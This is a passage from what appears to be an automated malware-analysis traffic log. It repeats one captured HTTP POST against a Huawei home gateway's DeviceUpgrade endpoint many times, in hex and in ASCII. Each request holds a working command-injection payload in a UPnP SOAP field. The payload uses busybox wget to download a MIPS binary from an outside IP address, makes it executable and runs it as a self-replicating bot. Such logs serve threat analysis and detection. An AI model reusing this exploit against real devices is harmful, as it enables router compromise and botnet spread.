2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 